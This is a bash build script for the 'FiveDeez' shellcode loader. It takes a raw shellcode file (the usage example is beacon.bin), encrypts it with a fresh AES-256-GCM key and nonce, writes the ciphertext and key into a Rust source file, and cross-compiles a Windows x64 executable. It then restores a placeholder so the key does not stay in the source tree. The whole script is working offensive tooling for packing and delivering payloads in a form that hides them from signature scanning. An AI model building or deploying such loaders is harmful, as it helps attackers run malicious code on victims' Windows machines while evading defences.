#!/usr/bin/env bash
# prepare.sh — build the FiveDeez shellcode loader
#
# Usage:
#   ./prepare.sh -i <shellcode.bin> [-o <output_name>] [--debug]
#
# Options:
#   -i <file>    Raw shellcode input file (required)
#   -o <name>    Output filename without .exe extension (default: fivedeez)
#   --debug      Debug build (no optimisations, symbols kept)
#   -h           Show this help
#
# Prerequisites:
#   source ~/.cargo/env                      (or add to ~/.bashrc)
#   sudo apt install gcc-mingw-w64-x86-64
#   rustup target add x86_64-pc-windows-gnu
#   sudo apt install openssl                 (ships with Ubuntu by default)

set -euo pipefail

TARGET="x86_64-pc-windows-gnu"
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
SHELLCODE_RS="${SCRIPT_DIR}/src/shellcode.rs"

# ---------------------------------------------------------------------------
# Placeholder content — restored after every build so key material never
# lingers in the source tree (runs on EXIT, success or failure).
# ---------------------------------------------------------------------------
PLACEHOLDER='//! shellcode.rs — encrypted payload blob and shared key material
//!
//! This file is auto-generated by prepare.sh — do not edit by hand.
//!
//!   ./prepare.sh -i beacon.bin [-o output_name]
//!
//! KEY, NONCE, and ENCRYPTED_SHELLCODE are replaced with fresh random
//! values on every prepare.sh run.

/// 32-byte AES-256 key — generated at build time by prepare.sh.
pub const KEY: [u8; 32] = [0u8; 32];

/// 12-byte GCM nonce — generated at build time by prepare.sh.
pub const NONCE: [u8; 12] = [0u8; 12];

/// AES-256-GCM encrypted shellcode — generated at build time by prepare.sh.
pub const ENCRYPTED_SHELLCODE: [u8; 16] = [0u8; 16];
'

restore_placeholder() {
    printf '%s' "$PLACEHOLDER" > "$SHELLCODE_RS"
}

trap restore_placeholder EXIT

# ---------------------------------------------------------------------------
# Argument parsing
# ---------------------------------------------------------------------------
INPUT_FILE=""
OUTPUT_NAME="fivedeez"
PROFILE="release"
CARGO_FLAGS="--release"

usage() {
    sed -n '2,16p' "${BASH_SOURCE[0]}" | sed 's/^# \{0,1\}//'
    exit 1
}

while [[ $# -gt 0 ]]; do
    case "$1" in
        -i) INPUT_FILE="$2"; shift 2 ;;
        -o) OUTPUT_NAME="$2"; shift 2 ;;
        --debug) PROFILE="debug"; CARGO_FLAGS=""; shift ;;
        -h|--help) usage ;;
        *) echo "[!] Unknown option: $1"; usage ;;
    esac
done

[[ -z "$INPUT_FILE" ]] && { echo "[!] -i <shellcode.bin> is required."; usage; }
[[ ! -f "$INPUT_FILE" ]] && { echo "[!] Input file not found: $INPUT_FILE"; exit 1; }

# ---------------------------------------------------------------------------
# Dependency checks
# ---------------------------------------------------------------------------
for cmd in cargo rustup openssl; do
    command -v "$cmd" >/dev/null 2>&1 || {
        echo "[!] Required tool not found: $cmd"
        [[ "$cmd" == "cargo" ]] && echo "    Run: source ~/.cargo/env"
        [[ "$cmd" == "openssl" ]] && echo "    Run: sudo apt install openssl"
        exit 1
    }
done

command -v x86_64-w64-mingw32-gcc >/dev/null 2>&1 || {
    echo "[!] MinGW-w64 linker not found."
    echo "    Run: sudo apt install gcc-mingw-w64-x86-64"
    exit 1
}

if ! rustup target list --installed 2>/dev/null | grep -q "${TARGET}"; then
    echo "[*] Adding Rust target ${TARGET}..."
    rustup target add "${TARGET}"
fi

# ---------------------------------------------------------------------------
# Step 1 — Generate fresh random key and nonce
# ---------------------------------------------------------------------------
echo "[*] Generating fresh AES-256 key and GCM nonce..."
HEX_KEY=$(openssl rand -hex 32)
HEX_NONCE=$(openssl rand -hex 12)
echo "    KEY  : ${HEX_KEY}"
echo "    NONCE: ${HEX_NONCE}"

# ---------------------------------------------------------------------------
# Step 2 — Build encrypt_payload helper (native Linux binary)
# ---------------------------------------------------------------------------
echo "[*] Building encrypt_payload helper..."
cargo build -p encrypt_payload --release -q

# ---------------------------------------------------------------------------
# Step 3 — Encrypt the shellcode
# ---------------------------------------------------------------------------
echo "[*] Encrypting shellcode: ${INPUT_FILE}"
ENCRYPTED_OUTPUT=$(
    "${SCRIPT_DIR}/target/release/encrypt_payload" \
        "$INPUT_FILE" \
        "$HEX_KEY" \
        "$HEX_NONCE"
)

SHELLCODE_SIZE=$(wc -c < "$INPUT_FILE")
echo "    Plaintext : ${SHELLCODE_SIZE} bytes"
echo "    Ciphertext: $(echo "$ENCRYPTED_OUTPUT" | grep 'Ciphertext' | grep -oP '\d+ bytes' | head -1)"

# ---------------------------------------------------------------------------
# Step 4 — Patch src/shellcode.rs with new consts
# ---------------------------------------------------------------------------
echo "[*] Patching src/shellcode.rs..."

{
    cat << 'HEREDOC'
//! shellcode.rs — encrypted payload blob and shared key material
//!
//! This file is auto-generated by prepare.sh — do not edit by hand.
//!
//!   ./prepare.sh -i beacon.bin [-o output_name]
//!
//! KEY, NONCE, and ENCRYPTED_SHELLCODE are replaced with fresh random
//! values on every prepare.sh run.

HEREDOC
    echo "$ENCRYPTED_OUTPUT" | grep -v '^//'
} > "${SCRIPT_DIR}/src/shellcode.rs"

echo "    src/shellcode.rs updated."

# ---------------------------------------------------------------------------
# Step 5 — Build the loader for Windows x64
# ---------------------------------------------------------------------------
echo "[*] Building fivedeez for ${TARGET} (${PROFILE})..."
# shellcheck disable=SC2086
cargo build --target "${TARGET}" ${CARGO_FLAGS} -q

# ---------------------------------------------------------------------------
# Step 6 — Copy output to named exe
# ---------------------------------------------------------------------------
SRC_EXE="${SCRIPT_DIR}/target/${TARGET}/${PROFILE}/fivedeez.exe"
OUT_EXE="${SCRIPT_DIR}/${OUTPUT_NAME}.exe"

cp "$SRC_EXE" "$OUT_EXE"
SIZE=$(du -sh "$OUT_EXE" | cut -f1)
SHA=$(sha256sum "$OUT_EXE" | awk '{print $1}')

echo ""
echo "[+] Done!"
echo "    Output : ${OUT_EXE}"
echo "    Size   : ${SIZE}"
echo "    SHA256 : ${SHA}"
